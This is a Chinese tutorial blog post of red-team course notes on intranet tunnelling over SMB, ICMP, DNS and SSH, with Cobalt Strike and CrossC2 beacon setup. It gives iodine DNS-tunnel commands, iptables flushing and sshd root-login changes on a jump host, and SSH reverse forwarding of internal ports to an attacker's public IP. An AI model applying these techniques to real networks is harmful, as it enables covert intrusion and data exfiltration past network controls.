当前位置:   article > 正文

内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac 简单总结

内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac 简单总结

第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac_内网安全-隧道技术_ssh_dns_icmp_smb_上线通讯linux_mac-CSDN博客

内网渗透—隧道技术_隧道技术csdn-CSDN博客

#SMB 隧道&通讯&上线 


判断:445 通讯 
上线:借助通讯后绑定上线 
通讯:直接 SMB 协议通讯即可 

上一篇文章有讲解


 
#ICMP 隧道&通讯&上线 


判断:ping 命令 
上线:见前面课程 
通讯:其他项目(icmpsh icmptunnel) 
https://github.com/esrrhs/spp 
https://github.com/bdamele/icmpsh 
https://github.com/esrrhs/pingtunnel 
 


#DNS 隧道&通讯&上线 

在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。


判断:nslookup dig 

DNS上线


1、上线环境:内网主机只出网 DNS 协议数据,解决上线 
-域名申请及配置 

        准备一个域名并配置两条NS解析,NS解析将子域名指定其它DNS解析


-监听器创建及配置 

http协议无法上线

配置监听器

设置监听器,Payload选择Beacon DNSDNS地址选择刚刚填写的ns1记录ns2记录,下面的DNS地址( Stager)填写A记录,也就是CS.xxx.fun


-后门绑定监听器及生成 

在受害者主机执行后门,上线,然后执行命令mode dns -txt

DNS隧道解决通讯问题


2、通讯环境: 
内网主机只出网 DNS 协议数据,解决通讯 
https://github.com/yarrick/iodine 

iodine工作原理是 ,通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。
判断出网:nslookup www.baidu.com 

将工具运行起来,运行起来后,你可以输入命令去查看一下网卡,会发现多出一个网卡,这里的选择的网段,千万不要和现有的网段冲突

-服务器:设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向 
iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD 

 

设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向 

-f:在前台运行
-c:禁止检查所有传入请求的客户端IP地址。
-P:客户端和服务端之间用于验证身份的密码。
-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。


-客户端:连接密码 xiaodi 并绑定域名指向 
iodine -f -M 200 -P xiaodi ns1.xiaodi8.com 

windows不建议用

客户端的工具其实可以直接去官网中下载已经编译好的,但是有一个问题就是无法直接使用,会出现报错,需要安装一个APT网卡

安装软件不现实

客户端的工具运行起来还需要管理员操作,都管理员了,我还要你个DNS隧道干嘛…同样这里,操作完输入命令后,可以看到多出了一个IP地址,刚刚设置的是192.168.0.1网段的IP,那么这里自动就会生成一个192.168.0.2的IP地址。

客户端建立192.168.0.2的虚拟网卡

测试链接


-尝试通讯尝试连接: 
ssh root@192.168.0.2 xiaodi


#SSH 隧道&通讯 

前提:跳板机为linux,获得root权限,

最好跳板机上不要有过多的防火墙策略,也就是Linux内置的防火墙策略,关策略需要使用root权限。

判断:ssh连接


1、上线:


由于CS无SSH协议监听器配置,无法上线。上线linux需要使用插件

内网渗透—Linux上线_cs上线linux-CSDN博客


2、通讯:


由于SSH协议存在于Linux系统,跳板机必须Linux
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */

开启ssh协议登录:


vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

ssh参数

-C:压缩传输,提高传输速度

  -f:将SSH传输转入后台执行,不占用当前的Shell

  -N:建立静默连接(建立了连接,但是看不到具体会话)

  -g:允许远程主机连接本地用于转发的端口

  -L:本地端口转发

  -R:远程端口转发

  -D:动态转发(SOCKS代理)

  -P:指定SSH端口


本地:出站封,走正向

  1. ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
  2. curl http://127.0.0.1:1122

将本地访问1.168080端口流量转发至本地的1122端口

结果:访问192.168.1.166本地1122端口,探测到1.16:8080


ssh远程转发:入站封,走反向

  1. ssh -CfNg -R 1234:192.168.1.15:8080 root@47.94.236.117
  2. curl http://127.0.0.1:1234

将跳板机上访问的IP地址及端口流量转发至攻击机上的某个端口,

将本地的访问1.168080端口流量转发至47.94.236.117的1234 端口

结果:探测到内网数据

攻击者访问自己本地的1234即可访问windows的8080端口

#控制上线-插件-Linux&Mac&IOS&Android

内网渗透—Linux上线_cs上线linux-CSDN博客


https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
1、插件使用
2、命令使用
使用参考:
https://gloxec.github.io/CrossC2/zh_cn/
目前版本只支持反向的https和正向的tcp
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/919504
推荐阅读
相关标签
  

闽ICP备14008679号